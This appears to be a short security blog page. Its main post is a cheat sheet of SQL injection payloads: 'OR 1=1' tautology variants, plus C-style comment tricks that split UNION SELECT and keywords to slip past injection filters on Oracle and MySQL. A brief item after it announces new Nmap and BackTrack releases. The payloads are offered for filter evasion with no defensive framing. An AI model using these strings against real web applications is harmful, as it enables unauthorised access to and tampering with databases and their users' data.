Latest Security News

or 1=1 replacements

here or some Simple replacments to Evoid SQL Injection filters



OR '1' = '1'
OR 1 = 1

OR 'unusual' = 'unusual'
OR 'Simple' = 'Sim' + 'ple'
OR 'Simple'= N'simple' # the N dosent make any diffrence
OR 'Simple' > 'S'
OR 'Simple' < 'X' OR 'Simple' LIKE 'Sim%' OR 2 > 1
OR 'Simple' IN ('Simple')
OR 'Simple' BETWEEN 'R' and 'T'
/**/OR/**/'Simple'='Simple'

play with spaces or drop them completely



UNION SELECT

To escape any filter that checks a UNION followed by spaces and then the work SELECT –we can use a C like comment syntax available for most of DB's

UNION /**/ SELECT name…
/**/UNION/**/SELECT/**/name…

For ORACLE use:
'/**/OR/**/'Simple'='Simple'

For MySql use:

UN/**/ION/**/ SE/**/LECT/**

nmap & backtrack new versions

nmap 4.50 version has been released ,now including the Zenmap GUI that support all of nmap features .including a lot of bug fixing and support for new scripts.

BackTrack 3 beta has been released - including 900MB extended usb version and a strip down CD version , added drivers for many wifi cards and much more pen test fun stuff!

Guss Christmas gonna be fun after all :)